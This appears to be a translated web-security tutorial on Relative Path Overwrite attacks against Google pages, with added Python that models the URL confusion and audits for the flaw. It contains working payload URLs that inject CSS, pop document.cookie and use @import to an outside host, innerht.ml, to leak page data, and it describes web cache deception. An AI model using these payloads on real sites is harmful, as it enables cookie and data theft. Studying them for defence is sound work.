Anyuntec.com
An RPO (Relative Path Overwrite) attack depends on how the browser and the web server each interpret the same URL, and takes advantage of web caching and of differences in server configuration.
Author: Li Yuhan
From: Anyun Technology
The example in this article uses CSS: a stylesheet referenced by a relative path in the page is made to resolve somewhere else, so that the browser ends up loading attacker-controlled CSS and XSS code is written into the page.
1. A first look at RPO attacks
Example page:
http://www.google.com/tools/toolbar/buttons/apis/howto_guide.html
Page source:
<html>
<head></head>
<title>Google Toolbar API - Guide to Making Custom Buttons</title>
<link href="../../styles.css" rel="stylesheet" type="text/css"/>
</html>
JSP accepts path parameters: everything after a semicolon in a path segment is treated as a parameter, so /path;/notpath is still served as the directory /path.
The browser percent-encodes the URL the user submits and the server decodes it again.
If %2f can be used in place of "/", the URL can be written as
http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html
and the page is still returned correctly:
the server receives /tools/toolbar/buttons/apis/howto_guide.html,
the browser sees /tools/toolbar/buttons/apis%2fhowto_guide.html.
The stylesheet imported by the page is now resolved as /tools/toolbar/buttons/../../styles.css:
the browser treats /tools/toolbar/buttons/ as the directory of the page, not /tools/toolbar/buttons/apis/, because it does not decode %2f.
So ../../styles.css climbs out of the wrong directory and ends up at /tools/styles.css.
That gives us more room to work with.
If we insert a fake directory, we can import a non-existent /tools/fake/styles.css:
http://www.google.com/tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html
The server receives /tools/fake/../toolbar/buttons/apis/howto_guide.html, which normalises back to the real page.
The browser sees /tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html.
The imported stylesheet is /tools/fake/..%2ftoolbar/buttons/../../styles.css.
The browser treats fake/ and ..%2ftoolbar/ as two different directories, so ../../ stops at /tools/fake/.
In this way any stylesheet under the Google domain can be imported.
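The two views of the URL described above, as an added example that is not code from the original article. It uses the article's own URLs; the server model (decode %2f and drop ";param" in a segment, as the article says JSP does) is an assumption about the target, not a statement about any real server.

```python
"""Added example, not from the original article: make the server/browser
disagreement behind RPO explicit.  The server model (decode %2f, strip
';params', collapse dot segments) is an assumption about the target."""
import posixpath
from urllib.parse import unquote, urljoin, urlsplit


def server_view(url: str) -> str:
    """Path the server ends up serving: each segment is percent-decoded
    (so %2f becomes a separator) and ';params' are stripped, then
    dot segments are collapsed."""
    segments = [unquote(s).split(";", 1)[0]
                for s in urlsplit(url).path.split("/")]
    return posixpath.normpath("/".join(segments))


def browser_view(url: str, href: str) -> str:
    """Path the browser requests for a relative href: RFC 3986 resolution
    against the raw, still-encoded URL, so %2f is NOT a separator and
    'apis%2fhowto_guide.html' is just a long file name inside /buttons/."""
    return urlsplit(urljoin(url, href)).path


def rpo_exposure(url: str, href: str) -> dict:
    """Compare the stylesheet the page author meant (resolved against the
    path the server actually serves) with the one the browser will fetch.
    A relative href that diverges is the precondition for RPO."""
    served = server_view(url)
    intended = browser_view("http://example.invalid" + served, href)
    actual = browser_view(url, href)
    return {"served": served, "intended_css": intended,
            "actual_css": actual, "diverges": intended != actual}


if __name__ == "__main__":
    base = "http://www.google.com/tools/"
    for tail in ("toolbar/buttons/apis/howto_guide.html",
                 "toolbar/buttons/apis%2fhowto_guide.html",
                 "fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html"):
        print(tail, rpo_exposure(base + tail, "../../styles.css"))
```

The third URL reproduces the article's fake-directory case: the server still serves the real page while the browser asks for /tools/fake/styles.css.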
Next, find a page that reflects a parameter into its body.
For example: http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&q=%0A{}*{background:red}
The page source contains: <div id="frontend directory page">
<font size="-1"><div class="resultNotFound"><p>Search <b>-
{}*{background:red}</b> did not match any gadgets
And http://www.google.com/tools/toolbar/buttons/gallery?foo=bar is automatically redirected to
http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&foo=bar
So the payload can be built directly.
The XSS code has to be carried in the URL itself, because the stylesheet request is built from the page URL (which is why it appears encoded twice below).
The constructed payload is http://www.google.com/tools/toolbar%2fbuttons%3fq%3d%250a%257b%257d*%257bbackground%253ared%257d/..%2f/apis/howto_guide.html
The request received by the server is /tools/toolbar/buttons/gallery?q=%0a{}*{background:red}/../apis/howto_guide.html
The request as seen by the browser is /tools/toolbar%2fbuttons%3fq%3d%250a%257b%257d*%257bbackground%253ared%257d/..%2f/apis/howto_guide.html
The imported stylesheet is /tools/toolbar%2fbuttons%3fq%3d%250a%257b%257d*%257bbackground%253ared%257d/..%2f/apis/../styles.css, i.e.
/tools/toolbar/buttons/gallery?q=%0a{}*{background:red}/style.css
/gadgets/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}/style.css
The stylesheet is successfully imported into the page.
Going further, CSS XSS code can be imported the same way, for example {xss:expression(alert(document.cookie))}:
Payload: http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bxss%253Aexpression(alert(document.cookie))%257D/..%2fapis/style.css
This pops up document.cookie.
Google's defence in depth is the response header X-Content-Type-Options: nosniff: a browser that honours it will not apply the Google Toolbar custom button page as a stylesheet, and IE9 honours the header.
IE8 and earlier do not recognise this header.
Other browsers such as Firefox and Chrome ignore this header when the stylesheet is loaded from the same domain.
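An added check, not from the original article, for the two things the defence-in-depth discussion above turns on: relative stylesheet hrefs (the RPO precondition) and the X-Content-Type-Options: nosniff header. The sample HTML is constructed from the page source quoted earlier; the header dictionary is a constructed stand-in for a real response.

```python
"""Added example, not from the original article: audit one HTML response for
relative stylesheet hrefs and a missing X-Content-Type-Options: nosniff header.
SAMPLE_HTML is constructed from the page source quoted in the article."""
from html.parser import HTMLParser


class _LinkCollector(HTMLParser):
    """Collect the href of every <link rel="stylesheet"> in the document."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and (a.get("rel") or "").lower() == "stylesheet":
            if a.get("href"):
                self.hrefs.append(a["href"])


def relative_stylesheets(html: str) -> list:
    """hrefs resolved against the document URL: neither absolute (scheme or
    protocol-relative //) nor root-relative (/...).  Only these can be
    redirected by the %2f trick the article describes."""
    p = _LinkCollector()
    p.feed(html)
    return [h for h in p.hrefs
            if not h.startswith(("/", "http://", "https://"))]


def audit(headers: dict, html: str) -> list:
    """Return findings as strings; an empty list means nothing to fix."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    for href in relative_stylesheets(html):
        findings.append(f"relative stylesheet href {href!r}: "
                        "use a root-relative or absolute URL")
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    return findings


SAMPLE_HTML = """<html><head>
<title>Google Toolbar API - Guide to Making Custom Buttons</title>
<link href="../../styles.css" rel="stylesheet" type="text/css"/>
</head></html>"""

if __name__ == "__main__":
    for finding in audit({"Content-Type": "text/html"}, SAMPLE_HTML):
        print("finding:", finding)
```

As the article itself notes, the header only helps in browsers that honour it for same-domain stylesheets, so the relative-href finding is the one that removes the root cause.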
2. Further exploitation
CSS parsers are lenient with imported stylesheets:
any page under http://www.google.com/* can be imported and parsed as a stylesheet.
If such a page contains private data and an injection point, CSS tricks can be used to steal the data.
Conditions: 1. the injection point must come before the private data;
2. whitespace characters such as %0a, %0c and %0d must be allowed at the injection point;
3. the private data must not contain spaces.
Payload: http://www.google.com/search?nord=1&q={}%0a@import"//innerht.ml?
@import is a rarely used rule that front-end developers easily overlook. It imports a CSS file and must precede every other rule except @charset, so introducing CSS through @import bypasses Google's defence in depth.
The payload creates an import rule, @import "//innerht.ml..., so the data leaked from the page is sent out with the import request.
It is then loaded through the RPO page:
Payload: http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D%2540import%2527%252Fsearch%253Fnord%253D1%2526q%253D%257B%257D%25250a%2540import%252527%252F%252Finnerht.ml%253F%2522/..%2f/apis/howto_guide.html
3. Extension: web cache deception
When the target site sits behind a caching server, requesting a static file such as a .css that does not actually exist under the current page makes the cache server store that page, user account data included, under the static file name, so an attacker can then read the user's account data straight from the cache.
File extensions that are typically cached:
aif,aiff,au,avi,bin,bmp,cab,carb,cct,cdf,class,css,doc,dcr,dtd,gcf,gff,gif,grv,hdml,hqx,ico,ini,jpeg,jpg, js,mov,mp3,nc,pct,ppc,pws,swa,swf,txt,vbs,w32,wav,wbmp,wml,wmlc,wmls,wmlsc,xsd,zip